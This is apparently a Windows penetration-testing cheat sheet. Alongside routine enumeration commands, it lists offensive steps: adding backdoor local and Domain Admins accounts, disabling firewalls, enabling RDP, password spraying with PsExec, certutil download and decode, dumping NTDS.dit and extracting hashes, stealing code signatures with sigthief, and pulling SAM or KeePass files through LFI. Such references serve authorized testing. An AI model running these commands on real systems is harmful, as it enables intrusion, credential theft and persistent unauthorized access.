WindowsPentestCommands

Commands used in Windows penetration tests

Checking version

Run systeminfo on the target. There are 2 things to check: the system version (e.g. 10.0.17134) and the cumulative patches installed (KB).

Before October 2016 patches were individual. After this date, patches are cumulative: the most recent KB installed has all the patches between October 2016 and the KB's release date.

If the windows base system predates October 2016, you need to both check :

• if important older (pre-2016) KBs are missing, use https://github.com/GDSSecurity/Windows-Exploit-Suggester
• if the most recently installed KB is up-to-date

If the windows base system postdates October 2016, checking the most recent KB installed is enough.

Listing disks

wmic logicaldisk get
fsutil fsinfo drives

List running services

GUI: services.msc

net start
sc query
wmic service get

List running processes

tasklist
wmic process

Stopping a process

taskkill /PID 10032 /F

Listing runkeys

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Listing scheduled tasks

GUI: taskschd.msc

Powershell (limited information):

Get-ScheduledTask
Get-ScheduledTaskInfo

Powershell (detailed information; Warning: need to be SYSTEM to see all tasks):

Get-ScheduledTask -TaskPath "\" |
    ForEach-Object { [pscustomobject]@{
     Server = $env:COMPUTERNAME
     Name = $_.TaskName
     Path = $_.TaskPath
     Description = $_.Description
     Author = $_.Author
     RunAsUser = $_.Principal.userid
     LastRunTime = $(($_ | Get-ScheduledTaskInfo).LastRunTime)
     LastResult = $(($_ | Get-ScheduledTaskInfo).LastTaskResult)
     NextRun = $(($_ | Get-ScheduledTaskInfo).NextRunTime)
     Status = $_.State
     Command = $_.Actions.execute
     Arguments = $_.Actions.Arguments }}

Listing users

Get current user info

whoami
whoami /groups
whoami /priv

List local users

All local accounts:

net user

Connected users:

quser
qwinsta

Get local user info

net user <username>

List domain users

net user /domain

Get domain user info

net user <username> /domain

Get domain info

Domain name:

echo %userdomain%
echo %userdnsdomain%
systeminfo

Domain controllers, including PDC:

nltest /dclist:

Adding users

Locally

net user /add kek ABCabc123
net localgroup Administrators kek /add

Note: always use a strong password when on a webshell or reverse shell because you may not be able to see errors.

Domain

Use this after elevating your kerberos privileges for instance:

net user kek ABCabc123 /add /domain 
net group "Domain Admins" kek /add /domain

Permissions

Listing permissions

icacls C:\Windows\SYSVOL\whatever

Granting permissions

icacls C:\Windows\SYSVOL\whatever /grant "NT AUTHORITY\Authenticated Users":F

List permissions of currently running processes and services

@echo off

setlocal enabledelayedexpansion

echo [i] Checking file permissions of running processes and their parent folder
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|findstr /i "executablepath"^|findstr /i /v "C:\\Windows\\"^|findstr ":"') do (
	for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
		CALL :check_permissions "%%y."
		CALL :check_permissions "%%~dpy"
	)
)

echo [i] Checking file permissions of running services and their parent folder
for /f "tokens=2 delims='='" %%x in ('wmic service list full^|findstr /i "pathname"^|findstr /i /v "C:\\Windows\\"^|findstr ":"') do (
	for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
		CALL :check_permissions "%%y."
		CALL :check_permissions "%%~dpy"
	)
)

exit /b 0

:check_permissions
	REM need to remove one char because of the way directories are handled
	SET real_path=%~1
	SET real_path=%real_path:~0,-1%
	echo %real_path%
	
	for /f "delims=" %%z in ('icacls "%real_path%"') do (
		set "string=%%z"
		REM from the output of icacls, remove the path on first line
		set "modified=!string:%real_path%=!"
		for /F "tokens=* eol= " %%S in ("!modified!") do (
			echo          %%S | findstr /r "F M W AD WD GW WDAC WO GA WEA WA" | findstr /i "everyone monde todos authenticated users utilisateurs  %username%"
		)
	)
	exit /b 0

Capturing packets

netsh trace start persistent=yes capture=yes tracefile=C:\Users\whatever\trace.etl
netsh trace stop

Run a command as another user

runas /user:domain\user cmd.exe

Password spraying

This will pop a cmd for each pwned account:

for /f %i in (users.txt) do @(echo %i && PsExec.exe -u domain\%i -p P@ssw0rd cmd.exe)

Running remote commands

psexec \\remotecomputer.domain -u domain\user -p password ipconfig
winrs -r:remotecomputer cmd
wmic /node:remotecomputer process call create "cmd.exe /c start.exe"

Downloading a payload

certutil -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip

Decode a base64 payload

certutil -decode test.exe.b64 test.exe

Check open ports

This one is powershell, but the timeout is horrendous:

tnc \\computer.domain -Port 80
tnc 10.0.0.1 -Port 443

This is much faster if you can create a function and call it:

function testport ($hostname='',$port=80,$timeout=100) {
  $requestCallback = $state = $null
  $client = New-Object System.Net.Sockets.TcpClient
  $beginConnect = $client.BeginConnect($hostname,$port,$requestCallback,$state)
  Start-Sleep -milli $timeOut
  if ($client.Connected) { $open = $true } else { $open = $false }
  $client.Close()
  [pscustomobject]@{hostname=$hostname;port=$port;open=$open}
}

Firewall

On older platforms (XP):

netsh.exe firewall set opmode mode=disable profile=all 

On newer platforms:

netsh advfirewall set currentprofile state off

GUI:

wf.msc

Enable RDP

Authorizing the service

reg add "HKLM\SYSTEM\CurrentControlSet\services\TermService" /v Start /t REG_DWORD /d 3 /f
sc config termservice start= auto

Starting the service

net start TermService

Authorize remote connections

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

At this point verify that the service is indeed listening:

netstat -a -p TCP

Dumping NTDS.dit

The preferred method is:

ntdsutil "ac i ntds" "ifm" "create full c:\.svg" q q

This might fail so you could use a disk shadow copy instead:

vssadmin create shadow /for=c:

Extract hashes:

impacket-secretsdump -ntds /path/Active\ Directory/ntds.dit -system /path/registry/SYSTEM LOCAL

Forging Binary Signatures

Using Visual Studio : >Windows> Developer Command Prompt for VS2017 Signtool: command-line tool to digitally sign/unsign files:

signtool sign /a /t C:\Path\To\Signature\signature.dll /v "C:\Path\To\The\File\file.exe"
signtool remove /s /v C:\Path\To\DLL\file.dll

Using Sigthief: Copy a signature from a binary to another:

sigthief.py -i ~/SignFromThisDll.dll -t ~/toThisDll.dll -o ~/FileWithBadSign.dll

Files to get via LFI

Check if the LFI works:

C:\Windows\win.ini

Fingerprinting the version:

C:\Windows\System32\eula.txt      (XP)
C:\Windows\System32\license.rtf   (Vista and above)

Dump the SAM base:

C:\WINDOWS\Repair\SAM
C:\WINDOWS\Repair\SYSTEM

Get binary files using a truncated arbitrary read

certutil -encode C:\Users\Public\passes.kdbx C:\temp\tmp
powershell -c "(Get-Content C:\temp\tmp)[0..500]"
powershell -c "(Get-Content C:\temp\tmp)[501..1000]"
...